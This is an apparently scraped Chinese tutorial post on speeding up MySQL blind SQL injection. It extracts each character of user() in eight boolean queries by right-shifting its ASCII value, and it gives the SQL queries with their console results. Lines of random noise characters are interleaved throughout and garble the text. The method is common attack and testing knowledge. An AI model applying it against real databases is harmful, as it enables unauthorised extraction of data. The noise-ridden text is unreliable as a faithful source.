关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位



下面将以查询mysql数据库当中user()的第一位为例:

& c! W0 n8 l, |& G( Z$ C  S
2 n6 ]: f5 f5 ]& t
ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)
  V2 p6 a$ P6 s1 s6 a7 x8 U8 j5 a
; h( _: N4 Q  B/ G9 m

首先执行如下sql语句:
) @8 T. `4 j* V% C1 ?# H, j* K# A# @

$ \. m1 t$ r+ Y4 Q
mysql> select (ascii((substr(user(),1,1))) >> 7)=0;


8 ]& G4 o: J/ f+ L6 Q2 g3 @% y
我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的


3 u( ^( X3 i6 U' t/ f' F6 [
! Y9 U( @5 ?* q" W第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1


) K* }7 N, U5 P. c$ C: G3 P
如果运算结果为1,说明第一位为0,不为1
5 g0 @& p' @8 _' P9 F' A9 O

( y- b  u2 }! {
+————————————–+

| (ascii((substr(user(),1,1))) >> 7)=0 |
% ~9 T* @, V5 `  @1 r: ?$ p
+————————————–+
- F+ h4 u5 {, S& X& p
| 1 |
& O8 K! S9 M& `' j% S) ~
' q8 t* {% F7 `4 v! P+————————————–+
; u& n0 H- ]8 R' u" T, d- L+ Y
3 s- z, R. g; |/ V1 row in set (0.00 sec)
: A7 {+ p6 ~5 P' f, L+ h
" f, w6 D% G! I' k. s: t这样我们就确定这个8bit的ascii的第一位为0
9 P# q) [7 [; ~( u$ G+ `4 p5 e

! R' d2 l+ Y1 h* `# f* Z
9 W0 X+ C5 @. q, u第二次我们来做6次右偏移来确定前两位
( x7 q9 F" P& y

% n' `% x7 k5 g
前两位可能是01或00,即依然可以与0做比较,

1 v, u2 j. [, Y' _mysql> select (ascii((substr(user(),1,1))) >> 6)=0;
4 e: c. f* e( S5 m
5 o; d9 _( h& I, B; h. G+————————————–+
& h' A3 g; g+ z2 s! q+ C1 p
| (ascii((substr(user(),1,1))) >> 6)=0 |
0 |- X8 d2 {( t1 p" \. A  q# w
, m7 y6 J; \# j# i( l+————————————–+
" G) q7 v1 ?: U
| 0 |
  K* c6 B8 w& g. I. \. A
+————————————–+

! c. \0 n. N+ h5 x4 _5 S1 row in set (0.00 sec)

: L1 r" ~, R6 S& P3 V% s5 J2 E! z
; c8 l2 ~4 D0 z7 _0 Q6 Z1 V$ d
0 ]8 b; k6 G$ C( j5 _# s0 L$ J结果为0,即第二位为1
0 W( X; A) `& e

, {4 P1 t- T+ _. Y
* z, v- h! m& i( o! s; n开始猜测前三位为010或011



让我们看看010和011的ascii码是多少

4 r1 x' d) B& p
1 x, E+ ^( Q* l1 t  J& ?! C) Y
9 }. O+ f& Z  A- b' B. a分别查询select b’011′ select b’010′

: u4 a" \% S; Q
* ]8 d# P  w7 V0 |$ ]
8 S8 A1 j7 Q  D: U% {/ d  o$ L获得结果 010 = 2 011 = 3
4 t0 V# ^" I. }8 j" ]


执行如下sql:



mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
/ y0 t  a7 _6 W% k. D* f: r+ V
+————————————–+

5 f/ t9 r% L/ d1 F3 \| (ascii((substr(user(),1,1))) >> 5)=2 |
+ D4 W4 Q* a1 U7 _& W9 N1 \
2 @" G5 i- t) p& @& o9 _+————————————–+

| 0 |
7 `3 b) H/ ]2 O6 B9 y7 V
+————————————–+
: b7 G/ V5 |* O: K  A
1 ?, ]" c! q& g; h4 i即前三位不为010,而是011

/ p8 w) l' x3 h" i  f- [; I

( ^& U5 s2 p7 @! \直到获得最后一位

# [1 A5 U$ ~; q; J7 @
$ u5 i& A8 m' l5 B. P' N
最终结果为:01110010
, k! i; J8 Q! g1 p


转换一下:
* C! ^1 D4 l* i: y8 B3 M2 {& F' m

7 ~4 Y6 P3 w! j9 h7 z0 `( X/ l
+ F& i& w2 `- `+ w+ N2 Rselect b’01110010′
7 C% ~+ T5 [( `, X
. \0 W. j, W1 a+ g7 W

查询结果
. D: _1 m3 o. C3 i: p
. J' _& z# E, \& ?  W: l' }

+————-+

| b’01110010′ |
6 E) |, R+ k4 |& i$ w5 F
+————-+
7 P! M, m6 B4 j: o. i' Q# f5 m
7 P; f# l" H/ a6 k/ J6 L| r |
) \# K: j- R1 A2 I! w
$ t0 I+ K6 h1 F+ ]9 m$ F+————-+

& p' u2 D' c8 X, C9 D7 d1 row in set (0.00 sec)
2 O1 z, M" j$ M- x. V8 r3 _" A+ [


2 B: r% x% Y$ r2 b7 x) n这样我们就获得了user()的第一位.其它位依此类推
* h! ~6 g3 ]! r) M. M# O